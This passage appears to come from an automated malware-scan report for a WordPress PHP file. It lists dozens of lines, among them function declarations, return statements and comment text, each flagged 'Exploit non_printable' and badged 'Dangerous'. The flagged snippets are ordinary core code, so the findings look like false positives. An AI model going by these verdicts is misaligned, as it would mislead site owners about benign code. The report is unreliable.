<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The checked string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_json_convert_string</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_string </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'mb_convert_encoding' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mb_convert_encoding</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_string</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mb_convert_encoding</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_string</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_check_invalid_utf8</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_string</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is no longer needed </span><span style="color: #007700">as </span><span style="color: #0000BB">support </span><span style="color: #007700">for </span><span style="color: #0000BB">PHP 5.2</span><span style="color: #007700">-</span><span style="color: #0000BB">5.3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4501</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">|</span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">float</span><span style="color: #007700">|</span><span style="color: #0000BB">null</span><span style="color: #007700">|</span><span style="color: #0000BB">string</span><span style="color: #007700">|array </span><span style="color: #0000BB">Data ready </span><span style="color: #007700">for `</span><span style="color: #DD0000">json_encode()</span><span style="color: #007700">`.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4503</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_json_prepare_data</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function( </span><span style="color: #0000BB">__FUNCTION__</span><span style="color: #007700">, </span><span style="color: #DD0000">'5.3.0' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_send_json</span><span style="color: #007700">( </span><span style="color: #0000BB">$response</span><span style="color: #007700">, </span><span style="color: #0000BB">$status_code </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$flags </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a </span><span style="color: #007700">%</span><span style="color: #0000BB">1$s </span><span style="color: #007700">or %</span><span style="color: #0000BB">2$s object from your callback when using the REST API</span><span style="color: #007700">.</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4567</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_send_json_success</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$status_code </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$flags </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4594</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_send_json_error</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$status_code </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$flags </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4622</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span><span style="color: #007700">. </span><span style="color: #0000BB">This helps to mitigate XSS attacks caused by directly</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the callback </span><span style="color: #007700">function </span><span style="color: #0000BB">name is valid</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_check_jsonp_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4637</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">0 </span><span style="color: #007700">=== </span><span style="color: #0000BB">$illegal_char_count</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">as </span><span style="color: #0000BB">associative arrays</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">as </span><span style="color: #0000BB">objects</span><span style="color: #007700">. Default </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4653</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed Returns the value encoded in JSON in appropriate PHP type</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4654</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">if </span><span style="color: #0000BB">the file is not found</span><span style="color: #007700">, or </span><span style="color: #0000BB">its content can</span><span style="color: #DD0000">'t be decoded.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4656</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_json_file_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4669</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false Number string on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4688</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$decoded_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">size_format</span><span style="color: #007700">( </span><span style="color: #0000BB">$bytes</span><span style="color: #007700">, </span><span style="color: #0000BB">$decimals </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function. </span><span style="color: #0000BB">This can be used to counter the redirection on your local</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Homepage location</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4706</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_config_wp_home</span><span style="color: #007700">( </span><span style="color: #0000BB">$url </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">untrailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">WP_HOME </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4710</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">. </span><span style="color: #0000BB">This can be used </span><span style="color: #007700">for </span><span style="color: #0000BB">debugging a site</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4726</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The WordPress site URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_config_wp_siteurl</span><span style="color: #007700">( </span><span style="color: #0000BB">$url </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4730</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">untrailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">WP_SITEURL </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4741</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_delete_option_fresh_site</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4760</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Direction set </span><span style="color: #007700">for </span><span style="color: #DD0000">'rtl'</span><span style="color: #007700">, if </span><span style="color: #0000BB">needed by locale</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4762</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mce_set_direction</span><span style="color: #007700">( </span><span style="color: #0000BB">$mce_init </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mce_init</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4782</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">relies on the </span><span style="color: #DD0000">'REST_REQUEST' </span><span style="color: #007700">global. As </span><span style="color: #0000BB">such</span><span style="color: #007700">, </span><span style="color: #0000BB">it only returns true when an actual REST _request_ is</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true when a REST endpoint is hit </span><span style="color: #007700">as </span><span style="color: #0000BB">part of another request</span><span style="color: #007700">, </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">g</span><span style="color: #007700">. for </span><span style="color: #0000BB">preloading a</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4786</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should not be called until the </span><span style="color: #007700">{@</span><span style="color: #0000BB">see </span><span style="color: #DD0000">'parse_request'</span><span style="color: #007700">} </span><span style="color: #0000BB">action</span><span style="color: #007700">, as </span><span style="color: #0000BB">the constant is only defined then</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s a WordPress REST API request, false otherwise.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4793</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_is_serving_rest_request</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">defined</span><span style="color: #007700">( </span><span style="color: #DD0000">'REST_REQUEST' </span><span style="color: #007700">) && </span><span style="color: #0000BB">REST_REQUEST</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a sum of timestamp with timezone offset</span><span style="color: #007700">. </span><span style="color: #0000BB">Ideally should never be used</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is called</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4810</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function and </span><span style="color: #0000BB">won</span><span style="color: #DD0000">'t be listed in</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4819</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smilies_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">number_format_i18n</span><span style="color: #007700">( </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$decimals </span><span style="color: #007700">) . </span><span style="color: #DD0000">' ' </span><span style="color: #007700">. </span><span style="color: #0000BB">_x</span><span style="color: #007700">( </span><span style="color: #DD0000">'B'</span><span style="color: #007700">, </span><span style="color: #DD0000">'unit symbol' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is used throughout WordPress to allow </span><span style="color: #007700">for </span><span style="color: #0000BB">both string </span><span style="color: #007700">or array</span>
</span>
